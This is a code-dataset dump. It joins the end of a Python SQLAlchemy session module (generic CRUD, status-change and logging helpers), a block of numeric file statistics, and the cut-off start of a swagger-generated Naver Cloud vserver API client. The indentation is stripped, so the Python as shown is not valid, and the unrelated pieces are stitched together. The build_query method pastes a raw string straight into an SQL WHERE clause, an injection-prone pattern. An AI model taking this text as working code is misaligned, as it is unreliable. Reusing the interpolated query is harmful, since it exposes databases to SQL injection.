msg = f"zero {_method_entity.upper()} records found. No Update"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': {},'row_count':row_count,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
rows_updated = 0
for current_record_obj in records:
record_dict = current_record_obj.to_dict()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
if changes:log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} update validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
self.rollback(**_process_call_area)
return api_result
else:
if current_record_obj.has_model_changed():
rows_updated = rows_updated + 1
if rows_updated>0 and auto_commit:
self.commit(**_process_call_area)
records_dict = self.rows_to_dict(table_model,records)
msg = f'OK. {rows_updated} {_method_entity.upper()} rows updated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': records_dict, 'row_count':row_count,'rows_updated':rows_updated, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
# # locate record
# if action_filter:
# locate_dict = {**action_filter}
# else:
# locate_dict = {**data_record}
# get from database
current_record_obj = self.get_table_row(table_model, locate_dict, caller_area=_process_call_area, **kwargs)
#current_record_obj = APIS.get_one_row(locate_dict)
#generic validations
if current_record_obj:
record_dict = current_record_obj.to_dict()
if action.upper() in ('ADD'):
msg=f'{_method_entity.upper()} already exist'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
else:
if action.upper() not in ('ADD', 'REFRESH','REGISTER'):
current_record_obj=table_model()
record_dict = current_record_obj.valid_model_fields_dictionary(data_record)
msg = f'{_method_entity.upper()} not found'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
if action.upper() in ('ADD'):
current_record_obj=table_model()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
if changes:log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.input_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} input validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg=f'OK. {_method_entity.upper()} added'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_added':1, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper() in ('UPDATE'):
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
if changes:log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
if not current_record_obj.has_model_changed():
msg=f"OK. {_method_entity.upper()} is synchronized. no changes applied"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} update validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} updated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_updated':1, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper() in ('REFRESH','REGISTER'):
if not current_record_obj:
current_record_obj=table_model()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
if changes:log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.input_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} input validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg=f'OK. {_method_entity.upper()} added'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_added':1,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
else:
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
if changes:log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
if not current_record_obj.has_model_changed():
msg=f"OK. {_method_entity.upper()} is synchronized. no changes applied"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_added':0,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} update validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} refreshed'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_added':0,'rows_updated':1, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper() in ('DELETE'):
if str(current_record_obj.status).upper() in ('DELETED'):
msg = f'OK. {_method_entity.upper()} already Deleted (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
current_record_obj.status='Deleted'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} deleted'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper() in ('REMOVE'):
if str(current_record_obj.status).upper() not in ('DELETED'):
msg = f'{_method_entity.upper()} must be DELETED before REMOVED (status:{current_record_obj.status})'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.delete(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
msg = f'OK. {_method_entity.upper()} removed'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper() in ('ACTIVATE'):
if str(current_record_obj.status).upper() in ('ACTIVE'):
msg = f'OK. {_method_entity.upper()} already Active (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
current_record_obj.status='Active'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} activated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper() in ('DEACTIVATE'):
if str(current_record_obj.status).upper() not in ('ACTIVE'):
msg = f'OK. {_method_entity.upper()} already inActive (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
current_record_obj.status='InActive'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} deactivated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper() in ('UNREGISTER'):
if str(current_record_obj.status).upper() not in ('ACTIVE'):
msg = f'OK. {_method_entity.upper()} already inActive (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
current_record_obj.status='UnRegistered'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} UnRegistered'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper() in ('CONFIRM'):
try:
confirmed = current_record_obj.confirmed
confirmed_in_record = True
except:
confirmed = 0
confirmed_in_record = False
if confirmed_in_record:
if confirmed:
if str(current_record_obj.status).upper() in ('ACTIVE'):
msg = f'OK. {_method_entity.upper()} already Confirmed (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID, api_result, **_process_call_area)
return api_result
else:
msg = f'OK. {_method_entity.upper()} Confirmed but status not active. (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_message(_method_msgID, 'warning', msg, **_process_call_area)
else:
if str(current_record_obj.status).upper() in ('ACTIVE'):
msg = f'OK. {_method_entity.upper()} already Confirmed (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID, api_result, **_process_call_area)
return api_result
if not confirmed:
current_record_obj.status='Confirmed'
try:
current_record_obj.confirmed_timestamp = now
except:
pass
try:
current_record_obj.confirmed=1
except:
pass
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} Confirmed'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID, api_result, **_process_call_area)
current_record_obj.status='Active'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} confirmed and activated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
else:#inquiry
msg = f'OK. {_method_entity.upper()} retrieved'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def build_query(self, table_model, kwargs):
if type(kwargs)==type({}):
query = self.session.query(table_model)
#query_rows = query.count()
#print(query_rows)
for key in kwargs.keys():
if key in table_model.__table__.columns.keys():
val = kwargs.get(key)
query = query.filter(getattr(table_model.__table__.columns, key) == val)
#query_rows = query.count()
#print(query_rows)
elif type(kwargs) == type(''):
select_sql=f"select * from {table_model.__tablename__} where {kwargs}"
query = self.session.query(table_model).from_statement(text(select_sql)).params().all()
else:
return None
#print(str(query))
return query
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def smart_locate_expression(self,table_model, locate_dict):
from_primary_key={}
from_unique_key={}
from_other_fields = {}
partial_pk = False
for column in table_model.__table__.columns:
if column.unique:
if column.key in locate_dict:
val = locate_dict[column.key]
if not val == None:
from_unique_key = {column.key: val}
#return from_unique_key
if column.primary_key:
if column.key in locate_dict:
val = locate_dict[column.key]
if not val == None:
from_primary_key.update({column.key: val})
else:
partial_pk = True
if not column.unique:
if column.key in locate_dict:
val = locate_dict[column.key]
if not val == None:
from_other_fields.update({column.key: val})
if from_primary_key and not partial_pk:
return from_primary_key
elif from_unique_key:
return from_unique_key
elif from_other_fields:
return from_other_fields
return {}
########################################################################################
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def smart_locate_expression2(self,table_model, locate_dict):
from_primary_key={}
from_unique_key={}
from_other_fields = {}
partial_pk = False
for column in table_model.__table__.columns:
if column.unique:
if column.key in locate_dict:
val = locate_dict[column.key]
if not val == None:
from_unique_key = {column.key: val}
#return from_unique_key
if column.primary_key:
val = locate_dict.get(column.key)
from_primary_key.update({column.key: val})
if not column.unique:
if column.key in locate_dict:
val = locate_dict[column.key]
if not val == None:
from_other_fields.update({column.key: val})
if from_primary_key and not partial_pk:
return from_primary_key
elif from_unique_key:
return from_unique_key
elif from_other_fields:
return from_other_fields
return {}
########################################################################################
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def get_table_row_as_dict(self, table_model, get_specification, caller_area={}, **kwargs):
rowObj = self.get_table_row(table_model, get_specification, caller_area=caller_area, **kwargs)
if not rowObj:
return {}
current_record_dict = table_model.to_dict(rowObj)
return current_record_dict
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def get_table_rows_as_dict(self, table_model, get_specification, caller_area={}, **kwargs):
rowObjs = self.get_table_rows(table_model, get_specification, caller_area=caller_area, **kwargs)
if not rowObjs:
return []
rows_array = self.rows_to_dict(table_model, rowObjs)
return rows_array
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def rows_to_dict(self, table_model, rowObjs, caller_area={}, **kwargs):
if not rowObjs:
return []
rows_array=[]
for rowObj in rowObjs:
current_record_dict = table_model.to_dict(rowObj)
rows_array.append(current_record_dict)
return rows_array
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def update_from_dict(self, model_record, **kwargs):
"""Update this model with a dictionary."""
changes = {}
readonly_columns = []
autoset_columns=[]
if hasattr(model_record, "_readonly_fields"):
readonly_columns += model_record._readonly_fields
if hasattr(model_record, "_hidden_fields"):
readonly_columns += model_record._hidden_fields
for c in model_record.__table__.columns:
if c.key not in readonly_columns:
if c.info:
if type(c.info) == type({}):
if c.info.get('is_readOnly'):
readonly_columns.append(c.key)
elif c.info.get('is_rowUID'):
val_old = getattr(model_record, c.key)
if val_old == None:
val_new = get_uuid(model_record.__table__,c.key)
setattr(model_record, c.key, val_new)
autoset_columns.append(c.key)
changes[c.key] = {"old_value": val_old, "new_value": val_new}
elif c.info.get('is_autoSetTimestamp'):
val_old = getattr(model_record, c.key)
if str(val_old).isnumeric():
val_new = datetime.datetime.utcnow()
setattr(model_record, c.key, val_new)
autoset_columns.append(c.key)
changes[c.key] = {"old_value": val_old, "new_value": val_new}
elif c.info.get('is_autoIncrementCounter'):
val_old = getattr(model_record, c.key)
if str(val_old).isnumeric():
val_new = int(val_old) + 1
setattr(model_record, c.key, val_new)
autoset_columns.append(c.key)
changes[c.key] = {"old_value": val_old, "new_value": val_new}
for key in kwargs:
if key in model_record.__table__.columns.keys():
if not key.startswith("_"):
if key not in readonly_columns and key not in autoset_columns:
val_old = getattr(model_record, key)
val_new = kwargs[key]
if str(val_old) != str(val_new):
changes[key] = {"old_value": val_old, "new_value": val_new}
setattr(model_record, key, val_new)
# heading = f"[{model_record.__tablename__}] [[changes]]:"
# print_changes(_method_msgID, changes,printLevel=_api_level)
return changes
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def commit(self, **kwargs):
session_debug_level = get_debug_option_as_level(self.debug)
process_id = kwargs.get('msgID', '')
caller_debug_level = get_debug_option_as_level(kwargs.get('debug_level'))
kwargs.update({'debug_level':max(session_debug_level,caller_debug_level)})
if not kwargs.get('indent_method'):
kwargs.update({'indent_method':'CALL_LEVEL'})
msg=f"[session] [[{self.session_id}]] [COMMIT]"
if process_id:
msg=msg+'#C0# in #C0#'+process_id
self.session.commit()
log_process_result_message('','session',msg,**kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def rollback(self, **kwargs):
session_debug_level = get_debug_option_as_level(self.debug)
process_id = kwargs.get('msgID', '')
caller_debug_level = get_debug_option_as_level(kwargs.get('debug_level'))
kwargs.update({'debug_level':max(session_debug_level,caller_debug_level)})
if not kwargs.get('indent_method'):
kwargs.update({'indent_method':'CALL_LEVEL'})
msg=f"[session] [[{self.session_id}]] [ROLLBACK]"
if process_id:
msg=msg+'#C0# in #C0#'+process_id
self.session.rollback()
log_process_result_message('','session',msg,**kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def close(self, **kwargs):
session_debug_level = get_debug_option_as_level(self.debug)
process_id = kwargs.get('msgID', '')
caller_debug_level = get_debug_option_as_level(kwargs.get('debug_level'))
kwargs.update({'debug_level': max(session_debug_level, caller_debug_level)})
if not kwargs.get('indent_method'):
kwargs.update({'indent_method':'CALL_LEVEL'})
msg=f"[session] [[{self.session_id}]] [CLOSE]"
if process_id:
msg=msg+'#C0# in #C0#'+process_id
self.session.close()
log_process_result_message('','session',msg,**kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def flush(self, **kwargs):
session_debug_level = get_debug_option_as_level(self.debug)
process_id = kwargs.get('msgID', '')
caller_debug_level = get_debug_option_as_level(kwargs.get('debug_level'))
kwargs.update({'debug_level':max(session_debug_level,caller_debug_level)})
if not kwargs.get('indent_method'):
kwargs.update({'indent_method':'CALL_LEVEL'})
msg=f"[session] [[{self.session_id}]] [FLUSH]"
if process_id:
msg=msg+'#C0# in #C0#'+process_id
self.session.flush()
log_process_result_message('','session',msg,**kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def set_msgID(api_name, api_action, api_table):
msgid=f"table [{api_table.upper()}] #MAGENTA#{api_name}#C0#"
return msgid
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# def uniqueid():
# seed = random.getrandbits(32)
# seed=0
# while True:
# yield seed
# seed += 1
def get_uuid(what='?',col='?'):
#print('====',what)
#x=str(next(unique_sequence))
#x=what+' '+col+' '+str(mydefault())
#x='|'+what+'|'+col+'|'+xguid(what,col)+'|'
x=str(uuid.uuid1(uuid._random_getnode()))
#return get_uuid()
#print_message(f"[UUID-SET] [[[{x}]]] [{col}] [[{what}]]")
return x
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# module initialization
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
module_ProgramName = os.path.splitext(os.path.basename(__file__))[0]
module_id = '{}'.format(module_ProgramName)
module_version = 0.1
module_identityDictionary = {
'module_ProgramName':module_ProgramName,
'module_id':module_id,
'module_version':module_version,
'module_is_externally_configurable':False,
}
module_configuration = {}
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
module_configuration = retrieve_module_configuration(__file__, module_identityDictionary, module_configuration, print_enabled=thisApp.DEBUG_ON, filelog_enabled=thisApp.FILELOG_ON, handle_as_init=False)
(print_enabled, filelog_enabled, log_file, errors_file,consolelog_enabled)=get_globals_from_configuration(module_configuration)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
module_configuration = add_methods_to_configuration('database_actions', module_configuration, leandroutechnologyforward_database_session_class, ['ALL'], ['_init_'])
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# methods == collect_method_names_from_class(leandroutechnologyforward_database_session_class, methods_ids=['ALL'])
# print(methods)
# exit(0)
# module_configuration = add_apis_to_configuration('database_actions', module_configuration, thisModuleObj, functions_ids, exclude_functions_ids)
#save_module_configuration(module_identityDictionary, module_configuration, print_enabled=consolelog_enabled, filelog_enabled=filelog_enabled)
thisApp.pair_module_configuration('database_actions',module_configuration)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
if get_module_debug_level(module_id) > 0:
actions = thisApp.application_configuration.get('database_actions', {})
for action_name in actions.keys():
action_entry = actions.get(action_name)
msg = f'module [[{module_id}]] database action [{action_name} [[[{action_entry}]]]'
if thisApp.get_module_debug_level(module_id):
log_message(msg)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# main
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
if __name__ == '__main__':
#tests/research
print(__file__)
| 62.100524
| 214
| 0.568093
| 7,384
| 71,043
| 4.987405
| 0.040222
| 0.04589
| 0.048877
| 0.029652
| 0.846444
| 0.822141
| 0.803025
| 0.794173
| 0.78046
| 0.770929
| 0
| 0.002372
| 0.234562
| 71,043
| 1,144
| 215
| 62.100524
| 0.674856
| 0.132033
| 0
| 0.721505
| 0
| 0
| 0.155013
| 0.033519
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025806
| false
| 0.002151
| 0.012903
| 0
| 0.132258
| 0.030108
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72d85077ba8907f2d03a9ee04954bbb531e33b63
| 295,042
|
py
|
Python
|
lib/services/vserver/ncloud_vserver/api/v2_api.py
|
NaverCloudPlatform/ncloud-sdk-python
|
5976dfabd205c615fcf57ac2f0ab67313ee6953c
|
[
"MIT"
] | 12
|
2018-11-20T04:30:49.000Z
|
2021-11-09T12:34:26.000Z
|
lib/services/vserver/ncloud_vserver/api/v2_api.py
|
NaverCloudPlatform/ncloud-sdk-python
|
5976dfabd205c615fcf57ac2f0ab67313ee6953c
|
[
"MIT"
] | 1
|
2019-01-24T15:56:15.000Z
|
2019-05-31T07:56:55.000Z
|
lib/services/vserver/ncloud_vserver/api/v2_api.py
|
NaverCloudPlatform/ncloud-sdk-python
|
5976dfabd205c615fcf57ac2f0ab67313ee6953c
|
[
"MIT"
] | 6
|
2018-06-29T03:45:50.000Z
|
2022-03-18T01:51:45.000Z
|
# coding: utf-8
"""
vserver
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ncloud_vserver.api_client import ApiClient
class V2Api(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_access_control_group_inbound_rule(self, add_access_control_group_inbound_rule_request, **kwargs): # noqa: E501
"""add_access_control_group_inbound_rule # noqa: E501
ACGInboundRule추가 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_access_control_group_inbound_rule(add_access_control_group_inbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param AddAccessControlGroupInboundRuleRequest add_access_control_group_inbound_rule_request: addAccessControlGroupInboundRuleRequest (required)
:return: AddAccessControlGroupInboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_access_control_group_inbound_rule_with_http_info(add_access_control_group_inbound_rule_request, **kwargs) # noqa: E501
else:
(data) = self.add_access_control_group_inbound_rule_with_http_info(add_access_control_group_inbound_rule_request, **kwargs) # noqa: E501
return data
def add_access_control_group_inbound_rule_with_http_info(self, add_access_control_group_inbound_rule_request, **kwargs): # noqa: E501
"""add_access_control_group_inbound_rule # noqa: E501
ACGInboundRule추가 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_access_control_group_inbound_rule_with_http_info(add_access_control_group_inbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param AddAccessControlGroupInboundRuleRequest add_access_control_group_inbound_rule_request: addAccessControlGroupInboundRuleRequest (required)
:return: AddAccessControlGroupInboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['add_access_control_group_inbound_rule_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_access_control_group_inbound_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'add_access_control_group_inbound_rule_request' is set
if ('add_access_control_group_inbound_rule_request' not in params or
params['add_access_control_group_inbound_rule_request'] is None):
raise ValueError("Missing the required parameter `add_access_control_group_inbound_rule_request` when calling `add_access_control_group_inbound_rule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'add_access_control_group_inbound_rule_request' in params:
body_params = params['add_access_control_group_inbound_rule_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
